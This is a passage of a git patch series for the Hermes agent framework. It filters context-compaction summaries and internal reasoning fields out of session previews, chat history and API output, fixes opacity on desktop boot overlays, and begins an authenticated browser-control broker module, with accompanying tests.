+ projected = project_compaction_message_for_display(message) + if projected is None: + projected = message.copy() + for internal_key in ( + "tool_calls", + "finish_reason", + "reasoning", + "reasoning_content", + "reasoning_details", + "codex_reasoning_items", + "codex_message_items", + ): + projected.pop(internal_key, None) projected["content"] = "" projected["display_kind"] = "hidden" - return projected - - projected["content"] = unwrapped.get("content") - projected.pop("display_kind", None) return projected diff --git a/gateway/run.py b/gateway/run.py index 84604b303b..9e9adaf5a5 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -59,6 +59,7 @@ from agent.conversation_compression import ( PREFLIGHT_COMPRESSION_STATUS_TEMPLATE, ) from agent.conversation_loop import INTERRUPT_WAITING_FOR_MODEL_PREFIX +from agent.compaction_display import project_compaction_message_for_display from agent.i18n import t from agent.interrupt_compat import request_hard_interrupt from agent.turn_context import ( @@ -23308,8 +23309,11 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew last_assistant = None try: for message in reversed(await self._session_db.get_messages(session_id)): - if message.get("role") == "assistant" and message.get("content"): - last_assistant = str(message.get("content")) + if message.get("role") != "assistant": + continue + projected = project_compaction_message_for_display(message) + if projected is not None and projected.get("content"): + last_assistant = str(projected.get("content")) break except Exception: last_assistant = None diff --git a/hermes_state.py b/hermes_state.py index 9fdc820035..4f4916761e 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -54,6 +54,7 @@ from hermes_state_common import ( # noqa: F401 (re-exported for back-compat) _FTS_CJK_TRIGGERS, _FTS_TRIGGERS, _LISTABLE_CHILD_SQL, + _PREVIEW_ELIGIBLE_SQL, _PREVIEW_RAW_SELECT, _RESET_END_REASONS, _RESET_END_REASONS_SQL, @@ -8878,6 +8879,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, @@ -8901,6 +8903,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, @@ -8940,6 +8943,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, @@ -12709,6 +12713,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, @@ -12739,6 +12744,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, diff --git a/hermes_state_common.py b/hermes_state_common.py index 58b3744859..2bc6572810 100644 --- a/hermes_state_common.py +++ b/hermes_state_common.py @@ -13,6 +13,13 @@ from agent.skill_commands import ( SKILL_SCAFFOLD_SQL_LIKE, describe_skill_invocation, ) +from agent.context_compressor import ( + LEGACY_SUMMARY_PREFIX, + SUMMARY_PREFIX, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, + _SUMMARY_END_MARKER, +) # Session preview = the head of the first user message, shown wherever a @@ -52,12 +59,90 @@ _PREVIEW_CONTENT_SQL = "REPLACE(REPLACE(m.content, X'0A', ' '), X'0D', ' ')" _PREVIEW_SCAFFOLDED_SQL = f"m.content LIKE '{SKILL_SCAFFOLD_SQL_LIKE}'" +def _sql_literal(text: str) -> str: + return "'" + text.replace("'", "''") + "'" + + +_SQL_WHITESPACE = "CHAR(9) || CHAR(10) || CHAR(13) || CHAR(32)" + + +def _sql_ltrim_whitespace(expression: str) -> str: + return f"LTRIM({expression}, {_SQL_WHITESPACE})" + + +def _sql_trim_whitespace(expression: str) -> str: + return f"TRIM({expression}, {_SQL_WHITESPACE})" + + +def _sql_starts_with(expression: str, prefixes: tuple[str, ...]) -> str: + trimmed = _sql_ltrim_whitespace(expression) + checks = [ + f"SUBSTR({trimmed}, 1, {len(prefix)}) = {_sql_literal(prefix)}" + for prefix in prefixes + ] + return "(" + " OR ".join(checks) + ")" + + +# Current and historical long-form prefixes share this complete introduction; +# their stale-item guidance diverges only after it. Matching the whole intro +# avoids treating an ordinary user message that merely starts with the short +# bracketed label as a compaction carrier. +_PREVIEW_LONG_FORM_PREFIX = SUMMARY_PREFIX.split("Do NOT answer", 1)[0] +_PREVIEW_SUMMARY_PREFIXES = ( + _PREVIEW_LONG_FORM_PREFIX, + LEGACY_SUMMARY_PREFIX, +) +_PREVIEW_STANDALONE_SUMMARY_SQL = _sql_starts_with( + "m.content", _PREVIEW_SUMMARY_PREFIXES +) +_PREVIEW_MERGED_AFTER_SQL = ( + f"SUBSTR(m.content, INSTR(m.content, {_sql_literal(_MERGED_SUMMARY_DELIMITER)})" + f" + {len(_MERGED_SUMMARY_DELIMITER)})" +) +_PREVIEW_MERGED_SUMMARY_SQL = ( + f"(INSTR(m.content, {_sql_literal(_MERGED_SUMMARY_DELIMITER)}) > 0" + f" AND {_sql_starts_with(_PREVIEW_MERGED_AFTER_SQL, _PREVIEW_SUMMARY_PREFIXES)})" +) +_PREVIEW_MERGED_PRIOR_SQL = _sql_trim_whitespace( + f"SUBSTR(m.content, 1, INSTR(m.content, {_sql_literal(_MERGED_SUMMARY_DELIMITER)}) - 1)" +) +_PREVIEW_MERGED_PRIOR_LTRIMMED_SQL = _sql_ltrim_whitespace( + _PREVIEW_MERGED_PRIOR_SQL +) +_PREVIEW_MERGED_PRIOR_UNWRAPPED_SQL = ( + f"CASE WHEN SUBSTR({_PREVIEW_MERGED_PRIOR_LTRIMMED_SQL}, 1," + f" {len(_MERGED_PRIOR_CONTEXT_HEADER)}) = {_sql_literal(_MERGED_PRIOR_CONTEXT_HEADER)}" + f" THEN {_sql_ltrim_whitespace(f'SUBSTR({_PREVIEW_MERGED_PRIOR_LTRIMMED_SQL}, {len(_MERGED_PRIOR_CONTEXT_HEADER) + 1})')}" + f" ELSE {_PREVIEW_MERGED_PRIOR_SQL} END" +) +_PREVIEW_FORCE_USER_REMAINDER_SQL = ( + f"SUBSTR(m.content, INSTR(m.content, {_sql_literal(_SUMMARY_END_MARKER)})" + f" + {len(_SUMMARY_END_MARKER)})" +) + +# Session preview subqueries select their first eligible user-authored content. +# Pure compaction rows are ineligible; force-user-leading and merged carriers +# remain eligible only when authentic content survives the wire boundary. +_PREVIEW_ELIGIBLE_SQL = ( + f"((NOT {_PREVIEW_STANDALONE_SUMMARY_SQL} AND NOT {_PREVIEW_MERGED_SUMMARY_SQL})" + f" OR ({_PREVIEW_STANDALONE_SUMMARY_SQL}" + f" AND INSTR(m.content, {_sql_literal(_SUMMARY_END_MARKER)}) > 0" + f" AND LENGTH({_sql_trim_whitespace(_PREVIEW_FORCE_USER_REMAINDER_SQL)}) > 0)" + f" OR ({_PREVIEW_MERGED_SUMMARY_SQL}" + f" AND LENGTH({_sql_trim_whitespace(_PREVIEW_MERGED_PRIOR_UNWRAPPED_SQL)}) > 0))" +) + + # The shared ``_preview_raw`` SELECT expression, interpolated by every listing # query. A scaffolded row gets a wider excerpt: the whole message while it fits # the budget, else head + tail (where the typed instruction lands) spliced # around SKILL_EXCERPT_JOINT. _PREVIEW_RAW_SELECT = ( - f"CASE WHEN {_PREVIEW_SCAFFOLDED_SQL}" + f"CASE WHEN {_PREVIEW_STANDALONE_SUMMARY_SQL}" + f" THEN {_PREVIEW_FORCE_USER_REMAINDER_SQL}" + f" WHEN {_PREVIEW_MERGED_SUMMARY_SQL}" + f" THEN {_PREVIEW_MERGED_PRIOR_UNWRAPPED_SQL}" + f" WHEN {_PREVIEW_SCAFFOLDED_SQL}" f" AND LENGTH(m.content) > {_PREVIEW_SCAFFOLD_WINDOW * 2}" f" THEN SUBSTR({_PREVIEW_CONTENT_SQL}, 1, {_PREVIEW_SCAFFOLD_WINDOW})" f" || '{SKILL_EXCERPT_JOINT}'" @@ -73,6 +158,7 @@ def _shape_preview(raw: Any) -> str: text = str(raw or "").strip() if not text: return "" + text = text.replace("\n", " ").replace("\r", " ") described = describe_skill_invocation(text) text = described if described is not None else text.split(SKILL_EXCERPT_JOINT)[0] if len(text) > _PREVIEW_MAX_CHARS: diff --git a/hermes_state_portability.py b/hermes_state_portability.py index decf8d3d8a..a66fc6cdce 100644 --- a/hermes_state_portability.py +++ b/hermes_state_portability.py @@ -16,6 +16,7 @@ from typing import Any, Dict, List, Optional from agent.skill_commands import SKILL_SCAFFOLD_SQL_LIKE from hermes_state_common import ( SCHEMA_SQL, + _PREVIEW_ELIGIBLE_SQL, _PREVIEW_RAW_SELECT, _shape_preview, _sql_session_last_active, @@ -107,6 +108,7 @@ class SessionPortabilityMixin: (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, @@ -191,6 +193,7 @@ class SessionPortabilityMixin: (SELECT {_PREVIEW_RAW_SELECT} FROM messages m WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL + AND {_PREVIEW_ELIGIBLE_SQL} ORDER BY m.timestamp, m.id LIMIT 1), '' ) AS _preview_raw, diff --git a/tests/gateway/test_api_server_compaction_projection.py b/tests/gateway/test_api_server_compaction_projection.py index ebbdcddc91..8a45d5410f 100644 --- a/tests/gateway/test_api_server_compaction_projection.py +++ b/tests/gateway/test_api_server_compaction_projection.py @@ -5,6 +5,7 @@ from __future__ import annotations from aiohttp.test_utils import TestClient, TestServer import pytest +from agent.compaction_display import project_compaction_message_for_display from agent.context_compressor import ( COMPRESSED_SUMMARY_METADATA_KEY, HISTORICAL_TASK_HEADING, @@ -79,6 +80,9 @@ class TestMessageProjection: tool_calls=[{"id": "stale"}], reasoning="internal compression reasoning", reasoning_content="internal compression reasoning", + reasoning_details=[{"type": "reasoning.summary", "summary": "internal"}], + codex_reasoning_items=[{"type": "reasoning", "id": "internal"}], + codex_message_items=[{"type": "message", "id": "internal"}], ) ) @@ -88,6 +92,9 @@ class TestMessageProjection: assert "finish_reason" not in projected assert "reasoning" not in projected assert "reasoning_content" not in projected + assert "reasoning_details" not in projected + assert "codex_reasoning_items" not in projected + assert "codex_message_items" not in projected def test_merged_carrier_preserves_only_real_prior_content(self): projected = APIServerAdapter._message_response( @@ -125,11 +132,16 @@ class TestMessageProjection: assert projected["content"] == [{"type": "text", "text": REAL_USER}] def test_real_message_that_mentions_marker_text_is_untouched(self): - content = "please explain the string [CONTEXT COMPACTION] in this bug report" - projected = APIServerAdapter._message_response(_row("user", content)) + message = _row( + "user", + "please explain the string [CONTEXT COMPACTION] in this bug report", + tool_calls=[{"id": "real"}], + reasoning="real provider payload", + ) + projected = project_compaction_message_for_display(message) - assert projected["content"] == content - assert "display_kind" not in projected + assert projected == message + assert projected is not message def test_unrelated_hidden_message_is_not_reclassified_as_compaction(self): message = _row("assistant", "ordinary hidden control row", display_kind="hidden") diff --git a/tests/gateway/test_telegram_topic_mode.py b/tests/gateway/test_telegram_topic_mode.py index 4fb1711008..2a85a82443 100644 --- a/tests/gateway/test_telegram_topic_mode.py +++ b/tests/gateway/test_telegram_topic_mode.py @@ -10,6 +10,13 @@ from unittest.mock import AsyncMock, MagicMock import pytest +from agent.context_compressor import ( + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, + _SUMMARY_END_MARKER, +) from hermes_state import SessionDB from gateway.config import GatewayConfig, HomeChannel, Platform, PlatformConfig from gateway.platforms.base import MessageEvent @@ -161,6 +168,67 @@ def _make_runner(session_db=None): return runner +@pytest.mark.asyncio +async def test_topic_restore_quote_never_exposes_compaction_scaffolding(tmp_path): + db = SessionDB(db_path=tmp_path / "state.db") + db.enable_telegram_topic_mode(chat_id="208214988", user_id="208214988") + db.create_session( + session_id="restorable", + source="telegram", + user_id="208214988", + ) + db.set_session_title("restorable", "Browser control") + db.append_message("restorable", "assistant", "real completed answer") + summary = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + db.append_message("restorable", "assistant", summary) + runner = _make_runner(session_db=db) + + result = await runner._restore_telegram_topic_session( + _make_event("/topic restorable", thread_id="17585"), + "restorable", + ) + + assert "Last Hermes message:\nreal completed answer" in result + assert "CONTEXT COMPACTION" not in result + assert "Historical Task Snapshot" not in result + db.close() + + +@pytest.mark.asyncio +async def test_topic_restore_quote_unwraps_merged_assistant_carrier(tmp_path): + db = SessionDB(db_path=tmp_path / "state.db") + db.enable_telegram_topic_mode(chat_id="208214988", user_id="208214988") + db.create_session( + session_id="restorable", + source="telegram", + user_id="208214988", + ) + carrier = ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" + "real completed answer\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n\n" + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + db.append_message("restorable", "assistant", carrier) + runner = _make_runner(session_db=db) + + result = await runner._restore_telegram_topic_session( + _make_event("/topic restorable", thread_id="17585"), + "restorable", + ) + + assert "Last Hermes message:\nreal completed answer" in result + assert "PRIOR CONTEXT" not in result + assert "CONTEXT COMPACTION" not in result + db.close() + + @pytest.mark.asyncio @pytest.mark.parametrize("thread_id", [None, "1"]) async def test_internal_root_telegram_dm_event_bypasses_topic_lobby( diff --git a/tests/test_session_skill_previews.py b/tests/test_session_skill_previews.py index b62198ddca..83353de97d 100644 --- a/tests/test_session_skill_previews.py +++ b/tests/test_session_skill_previews.py @@ -12,6 +12,14 @@ shaper directly, so the CASE expression and the Python side are covered together import pytest +from agent.context_compressor import ( + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _HISTORICAL_SUMMARY_PREFIXES, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, + _SUMMARY_END_MARKER, +) import agent.skill_commands as skill_commands import tools.skills_tool as skills_tool from hermes_state import SessionDB @@ -80,8 +88,6 @@ class TestSkillPreview: (row,) = db.list_sessions_rich(limit=10) assert row["preview"] == "/work" - - def test_rewind_picker_shows_the_typed_instruction( self, db, tmp_path, monkeypatch ): @@ -94,6 +100,92 @@ class TestSkillPreview: assert entry["preview"] == "/work — fix the title leak" +class TestCompactionPreview: + def test_literal_marker_text_is_still_a_real_user_preview(self, db): + message = "[CONTEXT COMPACTION — REFERENCE ONLY] what does this label mean?" + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=message) + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"].startswith("[CONTEXT COMPACTION — REFERENCE ONLY]") + assert row["preview"] != "" + + def test_pure_compaction_row_cannot_become_session_preview(self, db): + summary = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=summary) + db.append_message("s1", role="user", content="test the browser controller") + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"] == "test the browser controller" + + def test_historical_compaction_row_cannot_become_session_preview(self, db): + summary = ( + f"{_HISTORICAL_SUMMARY_PREFIXES[-1]}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}\n\n" + ) + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=summary) + db.append_message("s1", role="user", content="test the browser controller") + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"] == "test the browser controller" + + def test_force_user_leading_compaction_preview_preserves_live_ask(self, db): + carrier = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}\n\n" + "test the browser controller" + ) + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=carrier) + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"] == "test the browser controller" + + def test_merged_compaction_preview_preserves_prior_user_content(self, db): + carrier = ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" + "test the browser controller\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n\n" + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=carrier) + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"] == "test the browser controller" + + def test_empty_merged_carrier_does_not_block_later_user_preview(self, db): + carrier = ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n\n" + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + db.create_session(session_id="s1", source="cli", model="m") + db.append_message("s1", role="user", content=carrier) + db.append_message("s1", role="user", content="test the browser controller") + + (row,) = db.list_sessions_rich(limit=10) + + assert row["preview"] == "test the browser controller" + + class TestSkillScaffoldedSessionLookup: """Backing queries for `hermes sessions retitle-skills`.""" diff --git a/tests/test_tui_gateway_server.py b/tests/test_tui_gateway_server.py index 2f15a65015..ebdf9bb4d5 100644 --- a/tests/test_tui_gateway_server.py +++ b/tests/test_tui_gateway_server.py @@ -2582,6 +2582,83 @@ def test_history_to_messages_preserves_tool_calls_for_resume_display(): ] +def test_history_to_messages_drops_pure_compaction_scaffolding(): + from agent.context_compressor import ( + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _SUMMARY_END_MARKER, + ) + + summary = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + + assert server._history_to_messages( + [ + {"role": "user", "content": summary}, + {"role": "assistant", "content": "real answer"}, + ] + ) == [{"role": "assistant", "text": "real answer"}] + + +def test_history_to_messages_preserves_live_ask_without_compaction_scaffolding(): + from agent.context_compressor import ( + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _SUMMARY_END_MARKER, + ) + + carrier = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}\n\n" + "test the browser controller" + ) + + assert server._history_to_messages( + [ + { + "role": "user", + "content": carrier, + "tool_calls": [{"id": "stale"}], + "reasoning": "internal compaction reasoning", + } + ] + ) == [{"role": "user", "text": "test the browser controller"}] + + +def test_history_to_messages_unwraps_merged_assistant_carrier(): + from agent.context_compressor import ( + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, + _SUMMARY_END_MARKER, + ) + + carrier = ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" + "real completed answer\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n\n" + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" + ) + + assert server._history_to_messages( + [ + { + "role": "assistant", + "content": carrier, + "tool_calls": [{"id": "stale"}], + "reasoning_details": [{"summary": "internal"}], + } + ] + ) == [{"role": "assistant", "text": "real completed answer"}] + + def test_history_to_messages_ships_full_tool_args(): # This is the display projection. `context` is an 80-char preview for # collapsed row titles. A renderer that shows the full call (the expanded diff --git a/tui_gateway/server.py b/tui_gateway/server.py index 00fe114365..5b6a177569 100644 --- a/tui_gateway/server.py +++ b/tui_gateway/server.py @@ -35,6 +35,7 @@ from hermes_cli.env_loader import load_hermes_dotenv from utils import is_truthy_value from tools.environments.local import hermes_subprocess_env from agent.replay_cleanup import sanitize_replay_history +from agent.compaction_display import project_compaction_message_for_display from agent.skill_commands import describe_skill_invocation from agent.conversation_loop import INTERRUPT_WAITING_FOR_MODEL_PREFIX from tui_gateway import git_probe @@ -7673,6 +7674,9 @@ def _history_to_messages(history: list[dict]) -> list[dict]: for m in history: if not isinstance(m, dict): continue + m = project_compaction_message_for_display(m) + if m is None: + continue role = m.get("role") if role not in {"user", "assistant", "tool", "system"}: continue From b2c4f1f376167e7e34a88c3dbd544e1fdc848c14 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 18:26:23 +0530 Subject: [PATCH 007/161] refactor(api): reuse _COMPACTION_INTERNAL_FIELDS from compaction_display The 7-key internal-fields tuple was inlined twice (agent/compaction_display.py and _project_client_message); a drift between the copies would silently leak one internal field class through the API projection. Surfaced during review of PR #85442. --- gateway/platforms/api_server.py | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 143aae20c7..53e9ad7a70 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -441,20 +441,15 @@ def _project_client_message(message: Dict[str, Any]) -> Dict[str, Any]: summary delimiter. Tool calls are dropped from both shapes because a carrier's inherited calls are historical context, not live client output. """ - from agent.compaction_display import project_compaction_message_for_display + from agent.compaction_display import ( + _COMPACTION_INTERNAL_FIELDS, + project_compaction_message_for_display, + ) projected = project_compaction_message_for_display(message) if projected is None: projected = message.copy() - for internal_key in ( - "tool_calls", - "finish_reason", - "reasoning", - "reasoning_content", - "reasoning_details", - "codex_reasoning_items", - "codex_message_items", - ): + for internal_key in _COMPACTION_INTERNAL_FIELDS: projected.pop(internal_key, None) projected["content"] = "" projected["display_kind"] = "hidden" From f33b260afa13d89063d452f36eae44b6b403b340 Mon Sep 17 00:00:00 2001 From: emozilla Date: Fri, 21 Aug 2026 12:44:24 -0400 Subject: [PATCH 008/161] fix(desktop): boot overlays stay opaque under window glass MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The full-screen boot surfaces (connecting, onboarding, boot failure, root crash fallback) paint their backdrop with --ui-chat-surface-background, which the glass field turns transparent so can be the one painter (0483133842). That was harmless while glass shipped off; once it shipped on by default (be3166607e) every boot overlay became a window onto the shell behind it. These overlays mask the whole app, so they declare data-glass-opaque — the existing contract for surfaces that paint over siblings — which pins the token back to opaque chrome under glass and changes nothing when glass is off. --- .../src/components/boot-failure-overlay.tsx | 14 ++++++++++++-- apps/desktop/src/components/error-boundary.tsx | 7 ++++++- .../src/components/gateway-connecting-overlay.tsx | 4 ++++ apps/desktop/src/components/onboarding/index.tsx | 4 ++++ 4 files changed, 26 insertions(+), 3 deletions(-) diff --git a/apps/desktop/src/components/boot-failure-overlay.tsx b/apps/desktop/src/components/boot-failure-overlay.tsx index f07366f289..e479ce5bb9 100644 --- a/apps/desktop/src/components/boot-failure-overlay.tsx +++ b/apps/desktop/src/components/boot-failure-overlay.tsx @@ -284,7 +284,12 @@ export function BootFailureOverlay() { if (view === 'connect') { return ( -
+
{/* Subtle back affordance (projects/overlay idiom): muted → foreground on hover, no divider. */} @@ -307,7 +312,12 @@ export function BootFailureOverlay() { } return ( -
+
diff --git a/apps/desktop/src/components/error-boundary.tsx b/apps/desktop/src/components/error-boundary.tsx index 6ec1e4ca20..2d6593b629 100644 --- a/apps/desktop/src/components/error-boundary.tsx +++ b/apps/desktop/src/components/error-boundary.tsx @@ -143,7 +143,12 @@ function RootErrorFallback({ error, reset }: ErrorBoundaryFallbackProps) { const { t } = useI18n() return ( -
+
Date: Wed, 12 Aug 2026 16:37:11 +0700 Subject: [PATCH 009/161] feat(browser): add authenticated control broker --- gateway/browser_control_broker.py | 619 ++++++++++++++++++ gateway/platforms/api_server.py | 384 ++++++++++- gateway/session_context.py | 14 + hermes_cli/web_server.py | 30 +- tests/gateway/test_browser_control_api.py | 390 +++++++++++ tests/gateway/test_browser_control_broker.py | 159 +++++ .../test_browser_control_broker_hardening.py | 331 ++++++++++ tests/gateway/test_browser_control_cloud.py | 294 +++++++++ tests/tools/test_browser_extension_router.py | 198 ++++++ .../test_browser_extension_router_wiring.py | 92 +++ tools/browser_cdp_tool.py | 19 +- tools/browser_extension_router.py | 200 ++++++ tools/browser_tool.py | 82 ++- tui_gateway/methods_browser_control.py | 308 +++++++++ tui_gateway/server.py | 15 + tui_gateway/ws.py | 44 +- 16 files changed, 3155 insertions(+), 24 deletions(-) create mode 100644 gateway/browser_control_broker.py create mode 100644 tests/gateway/test_browser_control_api.py create mode 100644 tests/gateway/test_browser_control_broker.py create mode 100644 tests/gateway/test_browser_control_broker_hardening.py create mode 100644 tests/gateway/test_browser_control_cloud.py create mode 100644 tests/tools/test_browser_extension_router.py create mode 100644 tests/tools/test_browser_extension_router_wiring.py create mode 100644 tools/browser_extension_router.py create mode 100644 tui_gateway/methods_browser_control.py diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py new file mode 100644 index 0000000000..98e5dcdb28 --- /dev/null +++ b/gateway/browser_control_broker.py @@ -0,0 +1,619 @@ +"""Transport-neutral browser-control broker core (Phase 4). + +This module is the in-process heart of the browser-control feature: it binds +an *identity-scoped controller* (the party that physically drives a browser) +to *callers* (agents talking to that browser over any transport) without the +broker itself knowing anything about HTTP, WebSocket, or any wire format. The +transport layers built in later phases wrap this core; nothing here routes +traffic. + +Why a broker at all: the browser is a stateful, single-owner resource and the +agent side is multi-tenant (many principals, profiles, sessions) and +multi-transport (local API, remote API, …). A controller must never be +addressable by a caller that merely resembles the right identity, and a +command must never be completable twice, cancellable by a stranger, or +observable after its owner has gone away. Every rule below exists to make one +of those violations structurally impossible rather than merely discouraged. + +Contract (each rule is exercised by tests/gateway/test_browser_control_broker.py): + +- **Registration tickets are short-lived, single-use, identity-bound, and + cryptographically random.** ``mint_ticket`` returns an opaque value + (``secrets``-derived, >= 32 chars) plus an expiry derived from the injected + clock; ``consume_ticket`` exchanges it exactly once for the + :class:`ControllerScope` it was minted for, raising + :class:`TicketInvalid` for unknown, already-consumed, or expired values. + The ticket is the only cross-transport credential minted here; transports + decide how to carry it. + +- **Exact identity and capability selection.** ``attach`` registers a send + callback under a :class:`ControllerScope`; ``select`` returns a controller + only when the caller's scope matches on *every* identity field — + principal, profile, session, controller id, browser profile id, and + transport family — and the requested capability is present in the + controller's capability set. Partial matches return ``None``. + +- **One pending command per command id; single-shot completion.** Each + ``dispatch`` mints a fresh command id, emits one + ``browser.controller.command`` frame, and parks a waiter keyed by that id. + ``complete`` resolves a command exactly once and returns ``False`` for any + later attempt (late completion after cancellation or detach is ignored). + +- **Scoped cancellation.** ``cancel`` aborts only the pending command whose + scope and tool_call_id match, emits a ``browser.controller.cancel`` frame + for it, and returns ``False`` when nothing matched. + +- **Detach fails closed.** ``detach`` removes the controller and cancels every + pending command of that scope; waiting dispatchers observe + :class:`ControllerCancelled` rather than hanging or racing a detached + controller's late ``complete``. + +Thread-safety: all public state transitions happen under a single reentrant +lock; the send callback is invoked *outside* the lock so a controller may +synchronously ``complete`` from inside its own send (the no-op round trip), +and waiters are parked on per-command events, not on the broker lock. +""" + +from __future__ import annotations + +import logging +import secrets +import threading +import time +from dataclasses import dataclass, field +from typing import Any, Callable, Dict, Optional + +logger = logging.getLogger(__name__) +_OWNER_UNSET = object() + +#: Default lifetime of a minted registration ticket, in clock seconds. +DEFAULT_TICKET_TTL = 30.0 +#: Default wall time a dispatch waits for the controller to complete. +DEFAULT_COMMAND_TIMEOUT = 30.0 + +#: Wire method names for controller frames. Transport-neutral by contract: +#: transports carry these envelopes verbatim. +FRAME_COMMAND = "browser.controller.command" +FRAME_CANCEL = "browser.controller.cancel" + + +class BrowserControlError(Exception): + """Base class for broker contract failures.""" + + +class TicketInvalid(BrowserControlError): + """A registration ticket is unknown, already consumed, or expired.""" + + +class ControllerUnavailable(BrowserControlError): + """No attached controller exactly matches the requested scope/capability.""" + + +class ControllerCancelled(BrowserControlError): + """A pending command was cancelled (explicitly or by detach).""" + + +class ControllerTimeout(BrowserControlError): + """The controller did not complete the command before the timeout.""" + + +class ControllerRejected(BrowserControlError): + """The controller completed the command with ``ok=False``.""" + + +@dataclass(frozen=True) +class ControllerScope: + """Exact identity of a browser controller plus its capability set. + + Equality is structural over *all* fields, so two scopes differing in any + single field (including ``transport_family``) never match — this is the + "exact identity" contract. + """ + + principal_id: Optional[str] = None + profile_id: Optional[str] = None + session_id: Optional[str] = None + controller_id: Optional[str] = None + browser_profile_id: Optional[str] = None + transport_family: Optional[str] = None + capabilities: frozenset = frozenset() + + +@dataclass(frozen=True) +class Ticket: + """Opaque, single-use registration credential.""" + + value: str + expires_at: float + + +@dataclass +class _TicketRecord: + scope: 